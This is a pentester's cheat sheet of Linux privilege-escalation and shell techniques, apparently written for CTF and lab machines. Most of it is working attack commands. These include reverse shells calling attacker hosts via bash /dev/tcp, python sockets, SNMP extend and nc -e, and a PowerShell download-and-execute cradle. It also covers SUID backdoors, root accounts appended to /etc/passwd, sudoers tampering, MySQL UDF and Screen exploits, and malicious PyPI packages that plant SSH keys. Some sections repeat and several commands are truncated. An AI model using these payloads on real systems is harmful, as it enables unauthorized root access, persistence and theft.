Priv Esc Links:
1) useful, privesc/jail-escape tasks
2) Priv Esc Tech Explained Explained 2 Techniques Commands Priv Esc Techniques
3) Linux Restricted Shell Bypass Guide
Things to Check first for Linux Priv Esc
1. sudo -l
2. sudo su
3. uname -a /version --> check for vuln
4. check for files with root priv
5. check for cron jobs
6. /etc/passwd file --> writable ?
7. #PATH exploit
8. check for process with root
9. run pspy to check for running
processes & cron jobs
10. Check .bash_history
11. ls -la the home directory
12. Check /opt/, /var/www/html, /home/, /root, / , directories thoroughly
13. Check for World Readable files
14. Check if mysql is running as root.
15. "mount" command to check for permissions on folders/processes
16. Run "pspy -f" on the target and check for all running file system tasks
17. Check for file/folder permissions, even u dont own the file, folder might be owned by you, where you can add/delete files/filenames.
Ex: File is running as Root; folder owner is you.; delete the file and create a new file with the same name. you can get root access.
13. Check for World Readable files
14. Check if mysql is running as root.
15. "mount" command to check for permissions on folders/processes
16. Run "pspy -f" on the target and check for all running file system tasks
17. Check for file/folder permissions, even u dont own the file, folder might be owned by you, where you can add/delete files/filenames.
Ex: File is running as Root; folder owner is you.; delete the file and create a new file with the same name. you can get root access.
Binary PrivEsc:
file binary
strings binary
cat binary
ls -la binary
Check the file to see if its executing any commands.
Check for the file paths;
If the command is cat instead of /bin/cat --> path injection might be possible
decrease the size of terminal and check for changes
less binary
./binary | less //Try Getting an Interactive shell with less
//Then !Command to execute the command, it might only work with a definite screen size
./binary anycommand && /bin/bash
sudo -l --> Check for root priv directories and applications
sudo bash --> Get Root Shell
id --> get the user privilegs
When id is not installed use this script
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
Check Version and Distribution
uname -a cat /proc/version
cat /etc/issue
cat /etc/lsb-release
sudo id --> Check Privilege level
ps aux | grep root --> check for Applications running with root
netstat -tulpn --> see all connections, local and foreign
netstat -a --> find all listening ports
When netstat is not installed use this netstat without netstat - awk script
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
--> spwan a python shell; sometimes python3 works as well
Get Interactive Shell:
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl +Z
stty raw -echo
export TERM=xterm
Grep Recursively for a string
grep -iRI 'password'
#Grep for a user/string
grep bhanu /etc -R 2>/dev/null
Port Scanning using nc
echo "" | nc -nvw2 [targetIP] [port-range]
echo "" | nc -nvw2 20-100
Finding Files with Root Privileges:
find / -perm -4000 2>/dev/null | xargs ls -la
Finding World Readable Files: find / -perm -2 ! -type l -ls 2>/dev/null World Writable & Executable files find / \( -perm -o w -perm -o x \) -type d 2>/dev/null World Executable Folders: find / -perm -o x -type d 2>/dev/null
Find SUID & SGID Binaries:
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -1000 -type d 2>/dev/null #Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null #SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null #SUID (chmod 4000) - run as the owner, not the user who started it.
List the Capabilities of files which has Root Privileges
getcap -r / 2>/dev/null
#List all Capabilities
capsh --print
Find Services Running Behind Firewall/Localhost
netstat -ano netstat -tulpn
netstat -pantu | grep LIST #View listening ports
Try Sudo inject
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Ping Sweep
for i in {1..254} ;do (ping -c 1 10.10.10.$i | grep "bytes from" &) ;done
find . -type f -ls --> /Find files in all directories
lsof -l --> View Running Processes
echo os.system("/bin/bash") --> Escaping Limited Shell using ssh
gcc exploit.c -pthread -lcrypt -o Exploit --> Compile The Exploit gcc -m32 -Wl,--hash-style=both 9542.c -o exploit ./Exploit
cat .bash_history --> Check the Commands History
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/ -o allow_other --> Mount a share folder in your kali machine
df -h --> Get List of Machine Partitions (Mounted Devices as well)
/dev/shm --> World writable directory
cat /dev/sdb --> Might contain deleted data in the partition can try strings /dev/sdb for flags
python -m SimpleHTTPServer 8080 --> Start a communication server on your system wget http://yourip/ --> Run this in target machine to get this file
Send a File From Kali To Victim nc -nlvp 9001 < exploit.c --> Transfer files from Kali nc YourIpAddress 8001 > /tmp/exploit.c --> Get the file On Target Machine
Get a File From Victim to Kali on Kali: nc -l -p 8001 > filefoldername on victim: nc -w 5 8001 < /usr/local/bin/filename
Adding a Route to a different network which is accessible
#sudo ip route add CIDR dev Interface
sudo ip route add dev tun2
When anything can only be run as a specific user:
sudo -u UserName /bin/bash /works when you see this in sudo -l
Getting Root using PATH INJECTION: This can be done for relative paths only (my-program) which is actually in /bin/my-programs, but shown as my-program in process list. This can be exploited by 1) In process list --> full path should not be specified, relative path should be shown 2) check when my-program is running, what is causing it to run and make it run. 3) Check the original location by "which my-program" command. /bin/my-program 4) For this exploit to work you should have write access to any relative folders like /usr/local/bin; if /usr/local/bin is before /bin, we should be able to exploit this echo $PATH //get the path info /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games This is mandatory for this to work, because my-program first checks for /usr/local/bin directory as its first on the list and if the file "my-program" is available in the first directory itself - its gonna stop searching furthur. 5) now go to "cd /usr/local/bin" create a file with the same name as the program vi my-program 6) add a reverse shell in the my-program and make it run from external force which can get you root shell. dont forget to chmod +x my-program
Priv Esc using Path Injection
this technique can be used when an absolute path is not defined for an executable in any script or sercice
cd /tmp
echo 'bash -i >& /dev/tcp/ 0>&1' >gzip
echo 'chmod u+s /bin/bash' > suid
chmod +x gzip
export PATH=/tmp:$PATH
#execute the script as root which is using gzip(example) in it.
sudo /opt/
#SUID permission should look like
#-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash
#for suid permissions run
/bin/bash -p
Exploiting the Binary's Path Used in a Binary for example in a binary /usr/local/bin/devil (Has ROOT Privs) - there is a command which uses "cat" and calling a file from /home/freak ; cd /home/freak/ echo "/bin/sh" > cat export PATH=/home/freak:/freak:$PATH /usr/local/bin/devil /GET ROOT
Decode Binary to ASCII for Orchid CMS
perl -lpe '$_=pack"B*",$_' < <( echo 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 )
Dumping Data from Mysql
mysqldump -uUserNAME -pP@$$w0rd DB_NAME
Getting Root Using Mysql; When mysql is running as root -- Priv Esc
locate udf ///usr/lib/ --> this is essential for this exploit to work.
mysql -u root -p
select sys_exec('usermod -a -G admin john') //Giving root privileges
ctrl + C
sudo su //enter user password .. you are root now
Method II:
create function sys_exec returns integer soname '';
select sys_exec('chmod u+s /bin/bash');
ctrl + c
bash -p
Reference - Windows & Linux
Method - III -> Mysql 4.x - 5.x
searchsploit -m exploits/linux/local/1518.c
on Target Machine:
cd /tmp
cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname, -o raptor_udf2.o -lc
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/';
//If this doesnt work try this -->
select * from foo into dumpfile '/usr/lib/';
create function do_system returns integer soname '';
select * from mysql.func;
select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
\! sh
cat /tmp/out
cd /tmp
vi getroot.c //add the below content to this
int main()
setresuid(0, 0, 0);
setresgid(0, 0, 0);
return 0;
mysql -u root -p
select * from mysql.func;
//Creating a SUID Binary
select do_system('gcc -o /tmp/getroot /tmp/getroot.c');
select do_system('chmod u+s /tmp/getroot');
cd /tmp
For Windows Follow This --> Github Exploit Video Tutorial
Cracking mysql Hashes
mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;
#sample hash
hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Postgresql Is Running As Root
psql -h -d DB_NAME -U unixusrmgr //Enter Password later
\dt \\List Tables
\dp \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case)
Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');
Priv Esc When CAT is being used in system() function"
when an executable file is running cat in a system("cat /home/bhanu/root.txt"),
we can create a new path variable to our required directory, which results in
loading the last set path first and checks for the executable first in the last set
echo $PATH
// /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
echo "/bin/bash" > cat
chmod 777 cat
export PATH=/home/bhanu
echo $PATH
// /home/bhanu
./file_to_run /This file has the system() function with cat
#You get a new shell :) but as we deleted all the path variables - nothing will work,
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Port Scanning with NMAP:
for ip in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2>&1; done | grep open
Port Forwarding using SoCat: Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine. From Victim-1 machine: do a port scan as above and port forrward the required ports /Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 & socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & netstart -plunt /View the binded ports, we can see 8009 & 8080 in Victim_machine1 Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: socat tcp-listen:4321,fork tcp:KALI_IP:4321 &
Priv Esc When NMAP Is running as root /usr/local/bin/nmap --interactive !sh
Priv Esc When wget is running as root
Copy the /etc/passwd from the target machine
paste the /etc/passwd from the target and add this line at the end.
on Target:
sudo wget -O /etc/passwd
su bhanu
Priv Esc When Find is Running as root find /home -exec sh -i \;
Priv Esc when "Perl" is running as root
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Priv Esc When "PWD" is being used in a Binary
export PWD=\$\(/bin/bash\) //In the same directory as of the binary
Priv Esc with Spice Ports
netstat -anlp | grep LIST //are running
ps -ef | grep 5900 // shows what it is --> spice Port; libvert+
On Kali:
remote-viewer // apt install virt-viewer
proxychains remote-viewer spice://
proxychains remote-viewer spice://
proxychains remote-viewer spice://
when VNC opens --> send key --> ctrl+alt+del --> system reboots
interrupt the process --> press e
go to last but one line --> change "ro" to rw init=/bin/sh
passwd //change the password
Priv Esc when you have snmpd.conf - rwcommunity string
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD ‘nsExtendStatus.”evilcommand”‘ = createAndGo ‘nsExtendCommand.”evilcommand”‘ = /usr/bin/python3 ‘nsExtendArgs.”evilcommand”‘ = ‘-c “import sys,socket,os,pty;s=socket.socket();s.connect((\”KALI_IP\”,PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\”/bin/sh\”)”‘
Priv Esc/Enum when 121111 is running
telnet 11211
stats cachedump 1 0
get name1
get name2
Priv Esc When /etc/passwd is World Writable
openssl passwd -1 -salt freak password
--> used to generate salted password for /etc/passwd file;
freak = salt
password = password
$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> Hashed Password
username: Salted Value of username and password:0:0::root:/root:/bin/bash
--> create a new account with Root privileges
echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >>/etc/passwd
--> add this entry to /bin/passwd to get root access
su bhanu password: password
Priv Esc Using Python Library Hijacking
Rastalab - Python Library Hijacking
# go to the location of hte python scipt that you are trying to hyjack -
#which is running as a root or any required user
python -c 'import sys; print "\n".join(sys.path)'
#select a library, ex: shutil; go to a writable directory
mkdir fakelib
cd fakelib
import os
def make_archive(a, b, c):
os.system("nc 9001 -e '/bin/sh'")
#for example; if you can run as root without pass and it uses some python script
sudo PYTHONPATH=~/fakelib /opt/scripts/
Priv Esc When Sysinfo is running as root
mkdir /tmp/hack
cd /tmp/hack
nano lshw or fdisk or anyother command that is executed when you run sysinfo
#Add a reverse shell in the file
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
chmod +x filename
#add the folder to path, so that when sysinfo runs - it checks the path first
export PATH=/tmp/filename:$PATH
Priv Esc When /bin/bash or /bin/sh is SUID /bin/bash -p / -p == runs without changing privs /bin/sh -p / -p == runs without changing privs
Priv Esc for Sudo 1.8.27 -- (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
Priv Esc When luvit can be run without Password sudo -u USERNAME /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
Priv Esc when a User is running in Docker
docker images
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
Priv Esc when Snapd (< 2.37.1 is running
snap version //Check for version - anything before 2.37.1 is vulnerable
Use this exploit // Creates a new account
su dirty_sock //password:
snap changes //See changes - if sudo doesnt work
Priv Esc When Screen 4.5.0 is running as Root
save the below content into rootshell.c
#include <stdio.h>
int main(void){
execvp("/bin/sh", NULL, NULL);
gcc -o /tmp/rootshell /tmp/rootshell.c //Compile it
save the below content into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
printf("[+] done!\n");
gcc -fPIC -shared -ldl -o /tmp/ /tmp/libhax.c //Compile it
copy both the executable into /tmp directory in the target machine ..
Follow the below commands:
cd /etc
umask 000
screen -D -m -L echo -ne "\x0a/tmp/"
screen -ls
When Wildcard is used in Sudo sudo -l //Wildcard example --> /home/*/*/file.txt (This case is vulnerable) /var/www/*/*/file.txt dpkg -l sudo //1.8.16 sudo is vulnerable searchsploit sudoedit searchsploit -m linux/local/37710.txt Exploitation: mkdir folder1 cd folder1 mkdir folder2 cd folder2 ln -s /home/username/.ssh/authorized_keys file.html //Create a symbolic link sudoedit -u username /var/www/folder1/folder2/file.html //add here OR sudoedit -u username /var/www/ .ssh/authorized_keys /file.html //text editor will open the text as 2 files, where .ssh/authorized_keys can be edited On Kali: ssh-keygen //Copy the to authorized_keys which is file.html ssh -i id_rsa username@IP_ADDRESS
Priv Esc with Ldapseach
Might be useful --> Ldapsearch usage by Digital Ocean
cd /home/user/
cat ~/.ldaprc # if you read/see this file - you can authenticate
#Enumerate Users
ldapsearch -x -LLL -w P@SSWORD!
ldap can be used to exploit ssh access. if you have permission to ldap -
you can change the permission of a user and make them root user and allow ssh access
#Select a proper/useful group which has more priv than you ex;root/sudo
cat /etc/group
#Create a SSH public and private key
ssh-keygen -t rsa -f filename
#Select a user from the ldapseach results --> save the below into bhanu.idi
#Modify gidNumber & sshPublicKey
dn: uid=bhanu,ou=users,ou=citrix,ou=servers,dc=steins,dc=local
changetype: modify
replace: homeDirectory
homeDirectory: /root
add: objectClass
objectClass: ldapPublicKey
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDF3YcLaP/D6s/u2bpsdAGcazs7sGTiQq9VUqe6i07vNzNeVk64Ua/vAZ7YZ5UTc8879aAOKWIAy9ivh2H6iB2qqAIxD9x+lZE4PsAy9ViFxkVUqzsFZ7fwyeqreDXH/8JB/EqoU2+lV564PvfH4WgUU1w3zgeeQ9NvWQTPHQcvuHYnDMPOntLWmLwQIAQMoEwbsH3Tdc0yfkvtY5j8E1USySyiPt+yYbLQNWuJ0eEPHivlLWphd84fl5kIEVUYHJEvZXRAthrq2b+G/DeIDqps6UVbLQt8vQt2z7ZjtnwZS4xAO2WeBn30hisdKpOov81D4AQBHYo5BeIZlFeH/oEExybph93TRZpQL9RwmMsql84tkvOPfGZrUTCQ7PUTQN03+9GKFyJcdPIQdC5OM3DA+P/eO8jLftVJsenDKk560nbrhCiTTCNhn7rijfMxOTwyTStuZ7rryuP7rYYI+hNv3J5zof8LYf6a8435IUT9foN9KtHTO64502V1BbMqJBM=
replace: userPassword
userPassword: P@ssword!
replace: gidNumber
gidNumber: 55
#Run ldapmodiy query to change the user's password and gid
ldapmodify -D "cn=currnet_user,dc=steins,dc=local -w P@SSWORD! -f bhanu.ldi
Priv Esc when Pypi Server is running
Get the steps from here
mkdir shit
touch setup.cfg
mkdir shit
cd shit
nano __init__.pydef hello_word(): print("hello world")
nano ../
from setuptools import setup
print('Yo, let me save my ssh key on your machine, so tht ic an login ')
with open ('/home/low/.ssh/autorized_keys','w+') as f:
f.writelines('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfz8MF+Oae5$
description='Hello world enterprise edition',
nano ../setup.cfg
description-file =
cd ..
python3 sdist
cd dist
export HOME=/tmp/shit
cd ..
nano .pypirc
index-servers =
username: pypi
password: password
python3 sdist upload -r shit
running upload
Submitting dist/Shit_Program-0.1.tar.gz to
Server response (200): OK
cat /home/low/.ssh/authorized_keys #our ssh key
Priv Esc When Pip is running with no Passwd
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/
sudo pip3 install $TF
Priv Esc for chkrootkit
cd /etc/crontab //chkrootkit is running
dpkg -l chkrootkit // chkrootkit 0.49-4ubuntu1.
searchsploit -m exploits/linux/local/33899.txt
cd /tmp
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
sudo su //After the crontab time, run this and get root :)
PrivEsc When Dbus is Running gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /home/root.txt true
Escaping Limited Shell via SSH
ssh bhanu@ -t "/bin/bash" --> Escaping Limited Shell using ssh
Running Applications using SSH
ssh "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap
-s0 = capture everything; -w - = write the data; 'not port 22' = do not capture port 22 traffic
wireshark -k network.cap //-k = view the live traffic capture immediately.
ssh "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View Live Traffic
cmd /c dir \users\administrator --> to execute in web shell
formurl = -o uploads/revshell.php //
-> uploading a reverse shell from BurpSuite;
- o Destination Source
run the shell using IP/uploads/revshell.php and start a meterpreter
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
--> all files and dir with root access
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh
--> get a proper shell from a restricted shell
Try all the commands from this link one by one to get a complete shell
mysql -u root -p // logging as a root in mysql \! ls -l //Execute Commands
Connecting to SQL Server: sqsh -S -U username -P passaword xp_cmdshell 'whoami' /execute commands //If xp_commandshell is not turned on --> follow this EXEC SP_CONFIGURE 'show advanced options', 1 EXEC SP_CONFIGURE 'xp_cmdshell', 1 reconfigure go EXEC SP_CONFIGURE 'xp_cmdshell', 1 reconfigure go xp_cmdshell 'whoami' go Getting a Reverse Shell cp nishang/Shells/Invoke-PowerShellTcp.ps1 . Add this line at the end of the file & Save it Invoke-PowerShellTcp -Reverse -IPAddress -Port 900 python -m SimpleHTTPServer 8001 nc -nvlp 9001 xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('')" we get shell on netcat connection
Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd='
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